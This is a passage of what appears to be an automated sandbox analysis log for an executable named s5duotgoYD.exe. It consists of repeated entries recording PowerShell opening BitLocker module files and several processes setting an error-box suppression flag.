                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
